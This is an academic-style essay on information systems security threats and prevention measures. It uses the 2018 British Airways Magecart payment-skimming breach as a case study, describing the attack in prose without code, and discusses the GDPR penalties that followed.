Information Systems security is one of the biggest challenges facing society’s

technological age. Information Systems have become an integral part of everyday life in the
home, businesses, government, and organizations. Information Systems have changed the way
that people live their lives, conduct business, even run the government. Information Systems
have become such an important part of everyday life because there are many uses of
Information Systems that make it much easier and faster to perform certain tasks, or even to
perform certain tasks simultaneously. Information Systems have become so developed and
detailed in their short history. Society has developed along with the Information Systems,
becoming a more technologically-reliable generation, also known as the digital firm era. Along
with an increasing reliability for Information Systems, the digital firm era has also brought
about an increasing profitability, competitiveness, and efficiency for any business of any size
that uses an Information Systems.

Information security must be included as part of an organisation’s operating processes

to ensure that it is implemented in practice. Its incorporation into processes requires good
cooperation from information security management, personnel responsible for information
security, information system owners and service providers. Measures that increase information
security should be taken into account when processes are planned to ensure that security
requirements are fulfilled.

An organisation’s strategy is managed by means of a management system, which covers

the detailed organisation of information security as well as information security policies,
planning, responsibilities, procedures, processes and the necessary resources (Bizfluent, 2018).
A management system assists in monitoring and assessing the effectiveness and
appropriateness of information security measures. By continuously developing the system, it
is possible to improve the organisation’s preparedness to systematically manage its information
security.

Computer crime and computer abuse has become a widespread problem since the
evolution of Information Systems. Before Information Systems were invented, data was
protected more because most information was stored only in paper files, and only in certain
departments of a business where many users would not have access to the data. With the
evolution of Information Systems, large amounts of data can be stored in electric form rather
than in paper files, so the data can be viewed by a larger number of users. Since more users
can access the data electronically rather than manually, the data in turn, is more susceptible to
the threat of computer crime and computer abuse.

Many businesses and individuals often feel serious effects from the following computer
crime and computer abuse problems. Often at times, the users of Information Systems depend
so heavily on the systems that a small setback will often cause huge setbacks for the business
and individual. From a few minutes to a few days, the side effects of computer crime and
computer abuse can be damaging to a business or individual who relies heavily on Information
Systems to accomplish certain everyday tasks.

The current computer crime and computer abuse problems have threatened Information
Systems due to the increased reliability of businesses and individuals on Information Systems,
but also because of an increased risk of threat due to insecure telecommunication networks.
Many of the ordinary threats to Information Systems such as hardware failure, fire, software
failure, electrical problems, personnel actions, user errors, and telecommunication problems
also can lead to easier access to large volumes of data. When the telecommunication network
itself is threatened, Information Systems of an individual or business becomes even more
threatened.

Information systems security refers to the processes and methodologies involved with
keeping information private, accessible and promising its integrity. It also means by access
controls, which prevent unauthorized people from entering or retrieving a system, defending
information no matter where that information is and detection and remediation of security
breaches, as well as verifying those events. As the usage of internet and related
telecommunications technologies and systems has become unescapable, use of these networks
have create a new vulnerability for organizations or companies. These networks can be intruded
or disrupted in few ways. As a results, organizations or companies will face threats that could
affect and they will be vulnerable to information system security. Threats to information system
can come from a variety of places inside and external to an organizations or companies. To
secure the system and information, each company or organization should analyse the types of
threats that will be faced and how the threats affect information system security. There are few
examples of threats such as unauthorized access which are hacker and cracker, computer
viruses, theft, sabotage, vandalism and accidents. Hackers are unauthorized person who used
the latest technology and their skills to break into or disabled an unauthorized computer while
crackers are person who gains access to information system for malicious reason (Essay, 2016).

Threats may be flattened at a network from few different aspects of the network. Thus,
while one hacker may intrude an application and divert financial transactions to a fictitious
account, another intruder may attack the performance of the network and render it virtually
unusable. These are the examples of the most important sources of threats which are from
outside and inside threats. Outside threats are terrorism, hackers, malfeasants, former
employees, foreign political espionage, economic espionage by foreign governments or foreign
or domestic corporations, and liability lawsuits while inside threats includes employees,
hackers, mischief, legal, and uneducated users (Ghosh,2002). According to The Identity Theft
Resource Center, over 22 million records were exposed up to July 2018. In 2018, more than
600 data breaches are reported. A data breach is the intentional or unintentional release of
secure or private/confidential information to an untrusted environment. Other terms for this
phenomenon include unintentional information disclosure, data leak and also data spill. These
incidents happened to lots of big names of organisations including Under Armour, Facebook,
Uber and British Airways.

British Airways (BA) is the largest airline in the United Kingdom based on fleet size,
or the second largest, behind easyJet, when measured by passengers carried. The airline is
based in Waterside near its main hub at London Heathrow Airport. In January 2011 BA
merged with Iberia, creating the International Airlines Group (IAG), a holding
company registered in Madrid, Spain. IAG is the world's third-largest airline group in terms of
annual revenue and the second-largest in Europe. It is listed on the London Stock Exchange and
in the FTSE 100 Index. BA was created in 1974 after a British Airways Board was established
by the British government to manage the two nationalised airline corporations, British
Overseas Airways Corporation and British European Airways, and two regional
airlines, Cambrian Airways from Cardiff, and Northeast Airlines from Newcastle upon Tyne.
On 31 March 1974, all four companies were merged to form British Airways. After almost 13
years as a state company, BA was privatised in February 1987 as part of a wider privatisation
plan by the Conservative government. The carrier expanded with the acquisition of British
Caledonian in 1987, Dan-Air in 1992, and British Midland International in 2012. On 7
September 2018, British Airways disclosed a data breach impacting customer information
from roughly 380,000 booking transactions made between August 21 and September 5 of this
year (Lily,2018). The company said that names, addresses, email addresses, and sensitive
payment card details were all compromised.

Researchers from the threat detection firm RiskIQ have shed new light on how the
attackers pulled off the heist. RiskIQ published details tracking the British Airways hackers'
strategy on Tuesday, also linking the intrusion to a criminal hacking gang that has been active
since 2015. The group, which RiskIQ calls Magecart, is known for web-based credit card
skimming finding websites that do not secure payment data entry forms and vacuuming up
everything that gets submitted. But while Magecart has previously been known to use the same
broadly targeted code to scoop up data from various third-party processors, RiskIQ found that
the attack on British Airways was much more tailored to the company's specific infrastructure.
In its initial disclosure, British Airways said that the breach did not impact passport numbers
or other travel data. However, the company later clarified that the compromised data included
payment card expiration dates and Card Verification Value codes, the extra three or four-digit
numbers that authenticate a card even though British Airways has said it does not store CVVs.
British Airways further noted that the breach only impacted customers who completed
transactions during a specific timeframe—22:58 BST on August 21 through 21:45 BST on
September 5.

These details served as clues, leading analysts at RiskIQ and elsewhere to suspect that
the British Airways hackers likely used a "cross-site scripting" attack, in which bad actors
identify a poorly secured web page component and inject their own code into it to alter a victim
site's behavior. The attack doesn't necessarily involve penetrating an organization's network or
servers, which would explain how hackers only accessed information submitted during a very
specific timeframe, and compromised data that British Airways itself doesn't store. Klijnsma,
who pinned the recent Ticketmaster breach on Magecart and saw similarities with the British
Airways situation, started looking through RiskIQ's catalog of public web data; the company
crawls more than two billion pages per day. He identified all the unique scripts on the British
Airways website, which would be targeted in a cross-site scripting attack, and then tracked
them through time until he found one JavaScript component that had been modified right
around the time the airline said the attack began. The script is connected to the British Airways
baggage claim information page; the last time it had been modified prior to the breach was
December 2012. Klijnsma quickly noticed that attackers revised the component to include
code, just 22 lines of it often used in clandestine manipulations.

The malicious code grabbed data that customers entered a payment form and sent it to
an attacker-controlled server when a user clicked or tapped a submission button. The attackers
even paid to set up a Secure Socket Layer certificate for their server, a credential that confirms
a server has web encryption enabled to protect data in transit. Attackers of all sorts
have increasingly used these certificates to help create an air of legitimacy even though an
encrypted site is not necessarily safe. The airline also said in its disclosure that the attack
impacted its mobile users. Klijnsma found a part of the British Airways Android app built off
of the same code as the compromised portion of the airline's website. It's normal for an app's
functionality to be based in part on existing web infrastructure, but the practice can also create
shared risk. In the case of the British Airways Android app, the malicious JavaScript
component the attackers injected on the main site hit the mobile app as well. Attackers seem to
have designed the script by accommodating touchscreen inputs.

While the attack wasn't elaborate, it was effective, because it was tailored to the specific
scripting and data flow weaknesses of the British Airways site. RiskIQ says it is attributing the
incident to Magecart because the skimmer code injected into the British Airways website is a
modified version of the group's hallmark script. RiskIQ also views the attack as an evolution
of the techniques used in the recent Ticketmaster breach, which RiskIQ linked to Magecart,
though with the added innovation of directly targeting a victim's site rather than compromising
a third party.

The update to general data protection regulation (GDPR) stipulates that firms must
report a breach within 72 hours. It took British Airways just one day to announce it had been
hit by a cyber-attack between 21 August and 5 September (Kate, 2018). Despite BA’s quick
reporting of the breach, experts think the airline could be hit by a huge fine under the GDPR,
which came into place on May 25. Previously, the largest fine issued by the Information
Commissioner’s Office (ICO) was £500,000. But under GDPR, firms can be fined up to 4% of
turnover which in this case £500 million. If the airline’s parent group International Airlines
Group (IAG) is held accountable instead, the number could be even higher. The fines are in
addition to any compensation BA needs to pay to customers who might have suffered financial
fraud because of the breach. But the costs do not end there, BA has been threatened with a £500
million class-action lawsuit in a UK court by law firm SPG Law. It alleges BA is liable to
compensate for non-material damage under the Data Protection Act 2018, the UK’s
implementation of GDPR. The airline has already pledged to cover any losses suffered by its
customers, but SPG Law says that under GDPR, breach victims have a right to further
compensation of £1,250 each. It is clear BA is becoming a test case for the fines under GDPR.

A security breach may let out secrets and proprietary information that can damage
organisation’s reputation, business, or finances. With so much data stored digitally today, most
firms tend to focus their security efforts on stopping hackers and others from getting in (Andrez,
2016). Unfortunately, organisation’s biggest security risk may not come from the outside, but
the inside, in the form of current and former partners and employees. First action to take to
prevent from data breach is control employees’ access to data from the beginning. One of the
best ways to prevent data leaks after people leave is simply not to give them access in the first
place. Everyone who works for an organisation should only have access to the files and data
that are necessary to do their jobs. Sure, employer still must worry if a partner or someone else
higher up leaves, but it is easier to retrieve data from just a few people than from everyone at
the firm. Second, use only firm-based devices and systems. As mentioned, this can be a tough
one with the various ways we access information in this day and age, but it still can be done.
Do not let employees use their own personal email. This may be obvious, but it is extremely
important. By insisting that everyone only use work email, organisation can control an
employee’s access to what they receive and send throughout the workday. It also makes
removing employee from firm’s information database easy. If employer have the budget to
provide the employees with a firm-owned mobile device, this can alleviate issues with them
putting sensitive data on their personal phone. Then, when they leave, employer can simply
take back the phone, and all of the data contained on it. It’s also easier to install security
measures on firm-owned devices that can help employer locate them or wipe the data if
necessary.
 The third idea to overcome a data breach is to a plan in place. If an organisation
consistently keeps security as a top priority, it will be easier to identify a breach of information
and address it quickly. According to a 2013 American Bar Association study, 70% of law firms
said they were not sure if their firm’s security had ever been breached. Knowing when your
information is in the wrong hands will help you get that information back and identify the
culprits. Always educate the employees on how to keep their information safe and know when
they have been the victims of stolen information. This can be done through workshops,
educational videos, or phishing drills. Then, always review organisation’s security policies
with each client, and constantly communicate if or when you may need to share certain pieces
of personal information. Besides, keep track of who has and has shared confidential
information about the clients or the firm and for what purpose. If that information is later shared
with an unauthorized individual, organisation will have a better idea of where the breach
happened. Having these measures in place is not just a good way to protect and store data, it
also proves to clients and partners that your firm is serious, forward thinking, and committed
to the safety and security of everyone one’s work with.

Then, there are a few measures that should be taken into account for organisations to
enhance the information system’s security. First, employers should support cyber security staff.
Cyber security staff often cite a lack of organisational support as their biggest concern. By that,
they usually mean that they’re not given a sufficient budget or that senior staff don’t listen to
their requests. These problems are clearly linked. Senior staff are generally not cyber security
experts, and they often assume the field is little more than IT problems. However, cyber
security affects every part of an organisation, from its staff to its physical premises, and it’s
essential that organisations’ board rooms acknowledge that and give staff appropriate budgets.
Secondly, staff awareness courses should be conducted annually. Two of the biggest threats
organisations face are phishing and ransomware, both of which exploit human error. If
employees who receive phishing emails which often contain ransomware and unable to spot
them, the whole organisation is at risk. Similarly, accidental breaches, privilege misuse and
data loss are all the result of employees not understanding their information security
obligations. Educating staff on the ways they could put data at risk helps organisations turn one
of their biggest vulnerabilities into an area of strength. Training courses should be given to
employees during their induction and then repeated annually. Then, policies and procedures
should be reviewed regularly. Policies and procedures are the documents that establish an
organisation’s rules for handling data. Policies provide a broad outline of the organisations
principles, whereas procedures detail how, what and when things should be done. The evolving
cyber threat landscape makes it imperative that organisations regularly review their policies
and procedures. If a procedure is not working, it needs to be rewritten.

As conclusion, information systems security is one of the biggest challenges facing our
society the technological age. Information systems have become an integral part of everyday
life in the home, businesses, government, and private organizations. Information systems have
changed the way that people live their lives, conduct business, even how run the government.
Information systems have become such an important part of everyday life because there are
many uses of information systems that make it much easier and faster to perform certain tasks,
or even to perform certain tasks simultaneously. It the great abilities that this technology
provides us we are burden with an ethical and moral obligation to manage and control ourselves
as well as others for the greater good of mankind.
References

Bizfluent (June 2018) Role Of Information System In An Organization. Retrieved from

https://bizfluent.com/about-6525978-role-information-systems-organization.html

Essays, UK. (November 2013). The Threats Of Information System Security Information
Technology Essay. Retrieved from https://www.ukessays.com/essays/information-
technology/the-threats-of-information-system-security-information-technology-
essay.php?vref=1

S. Ghosh, New York (2002) Principles of Secure Network Systems Design, Springer Science
+ Business Media

Lily Hay Newman (September 2018). How Hackers Slipped By British Airways' Defences.
Retrieved from https://www.wired.com/story/british-airways-hack-details/

Kate O’Flaherty (September,2018) How The British Airways Breach Will Reveal The True
Cost Of GDPR. Retrieved from https://www.forbes.com/

Andrez Hernandez (July 2016) How To Prevent A Security Breach. Retrieved from
https://www.lawtechnologytoday.org/2016/07/how-to-prevent-a-security-breach/